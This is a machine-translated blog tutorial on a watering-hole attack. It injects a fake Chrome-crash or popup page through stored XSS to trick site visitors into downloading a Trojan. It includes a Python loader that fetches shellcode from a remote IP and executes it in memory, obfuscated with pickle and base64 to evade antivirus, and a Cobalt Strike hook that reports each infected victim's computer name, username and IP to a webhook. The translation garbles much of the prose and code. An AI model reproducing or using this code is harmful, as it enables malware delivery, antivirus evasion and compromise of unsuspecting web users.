Shulou(Shulou.com)06/01 Report--

This article mainly explains "how to use fishing to achieve puddle attack". Interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn how to use fishing to achieve puddle attack.

First, a brief introduction to the concept: 1. XSS XSS wiki interpretation is a kind of code injection, so there are many things that can be done, not limited to the alert bullet box (feel that many people think that XSS is a bullet box, do not recognize it if not popped up), steal Cookie and other operations, the following to achieve the puddle attack is a kind of use. two。 Puddle attack, the word comes from the animal world (sure enough, technology comes from life), to the effect that crocodiles lurk in puddles waiting for prey to drink water and attack when prey comes to eat and relax. Corresponding to the network world is the attacker through the analysis of the user's behavior, in the user's only way to bury the trap, waiting for the user to be recruited.

Remarks: after analysis, it is a puddle attack, whether it is fishing or not, it doesn't matter, .

Second, principle

Principle: on the website that the target will visit, use JS to construct the page carefully to induce users to download Trojans.

Prerequisites:

You need a storage-based XSS, preferably with webshell permissions for easy change.

A kill-free Trojan horse must have a kill-free effect. You can't be killed on landing.

Online notification and automatic end plug-in to avoid staring at the page, and uninstall the page after taking the bait.

III. Realization

Process:

1. Use JS to write an induction page, do not update the page with flash, it has been played by others for many years.

I wrote two pages, one is to imitate the page after the chrome browser crashed, and the other is the pop-up page using layer.

Code 1, chrome browser crash page:

Var body = document.body; var _ left = window.innerWidth * 0.3 + 'px'; var _ top = window.innerHeight * 0.3 +' px'; var _ height = window.innerHeight body [XSS _ clean] = `

Oh, it's freaking out! There was a problem displaying this page. Please enable the display plug-in on your page, which may be helpful. Fix it immediately

Effect figure 1:

(users will download Trojans when they click repair.)

Code 2, using layer to realize pop-up window

You can see the official demo code https://layer.layui.com/ of layer.

The specific content of this is not written, because the need for specific page specific analysis, we can play their own.

Layui.use ('layer', function () {var layer = layui.layer / / bullet layer layer.open ({type: 1, skin:' layui-layer-rim', / / with a border area: ['420px,' 240px'], / / width and height content: 'html content'}) })

Premise: you need to introduce the laye component first, and when you inject XSS, you can introduce one more script tag.

Effect figure 2:

two。 Exempt from killing

CS is used here and deserialization + detach immunity is used, refer to Big Boss's article:

Https://mp.weixin.qq.com/s/sd73eL3-TnMm0zWLCC8cOQ

Do not use pyinstaller packaging, or it will certainly report poison, recommend py2exe, but there is also a problem, that is, more than one file after compilation, checked a lot of documents did not solve, the final test found that only need to bring libffi-7.dll, barely able to use.

Code (you don't have to use django, just separate the shellcode):

Import pickleimport base64,requestsshellcode = "" import ctypes,urllib.request,codecs,base64resp = requests.get ("http://39.*.*.*/shellcode.txt")base64_code = resp.contentshellcode = base64.b64decode (base64_code) shellcode = codecs.escape_decode (shellcode) [0] shellcode = bytearray (shellcode) # set VirtualAlloc return type to ctypes.c_uint64ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64# request memory ptr = ctypes.windll.kernel32.VirtualAlloc (ctypes.c_int (0)) Ctypes.c_int (len (shellcode)), ctypes.c_int (0x3000), ctypes.c_int (0x40)) # put in shellcodebuf = (ctypes.c_char * len (shellcode)) .from_buffer (shellcode) ctypes.windll.kernel32.RtlMoveMemory (ctypes.c_uint64 (ptr), buf Ctypes.c_int (len (shellcode)) # create a thread to execute handle = ctypes.windll.kernel32.CreateThread (ctypes.c_int (0), ctypes.c_int (0), ctypes.c_uint64 (ptr), ctypes.c_int (0), ctypes.c_int (0) from the first address of the shellcode prevention location Ctypes.pointer (ctypes.c_int (0)) # wait for the thread created above to finish running ctypes.windll.kernel32.WaitForSingleObject (ctypes.c_int (handle), ctypes.c_int (- 1)) "" class AAAA (object): def _ _ reduce__ (self): return (exec, (shellcode) ) ret = pickle.dumps (AAAA ()) ret_base64 = base64.b64encode (ret) ret_base32 = base64.b32encode (ret) print (ret_base32) print (ret_base64) ret_decode = base64.b64decode (ret_base64) import base64,pickle,ctypes,urllib.request,codecs Requestsret = b'QACJKXQEAAAAAAAAACGAQYTVNFWHI2LOOOKIYBDFPBSWHFE3TNBSWY3DDN5SGKLTUPB2CEKIKMJQXGZJWG. RPWG33EMUQD24TFONYY3PNZ2GK3TUBIFHG2DFNRWGG33EMUQD2IDCMFZWKNRUFZRDMNDEMVRW6ZDFFBRGC='ret_decode = base64.b32decode (ret) # print (ret_decode) pickle.loads (ret_decode) from distutils.core import setupimport py2exesetup (options= {'py2exe': {' optimize': 2, 'bundle_files': 1,' compressed': True,},} Windows= [{"script": "test9.py",}], zipfile=None,)

3. Online notification, automatic end

Use the boss's project:

Https://github.com/TheKingOfDuck/XSS-Fishing2-CS

The most interesting part of the whole process is here:

The general principle is that you need a Server side to output xss malicious code when it is not online. After CS is online, it will trigger event execution to send a special request (a request with the IP of the online user), cancel the xss malicious code, return to normal, and achieve an automatic end.

During the test, I found that the online reminder was not easy to use, and what I needed was a notice from WeCom to move this part of the function to the Server side.

Specific code:

Cs plug-in

On beacon_initial {$webhook = "https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=*****************************"; local ('$externalIP $computerName $userName'); $externalIP = replace (beacon_info ($1," external "),"," _ "); $computerName = replace (beacon_info ($1," computer "),"," _ ") $userName = replace (beacon_info ($1, "user"), "", "_"); $message = 'New Bot Online:\ n\ n Computer name:'.$computerName.'\ n\ nUsername:'.$userName.'\ n\ nexternalIP:'.$externalIP; $xssApi = "http://39.*.*.*/xss.php?ip=".$externalIP; @ curl_command = @ (' curl','- Xbox, 'GET', $xssApi) Exec (@ curl_command);}

Server PHP implementation:

Effect:

At this point, I believe you have a deeper understanding of "how to use fishing to achieve puddle attack". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.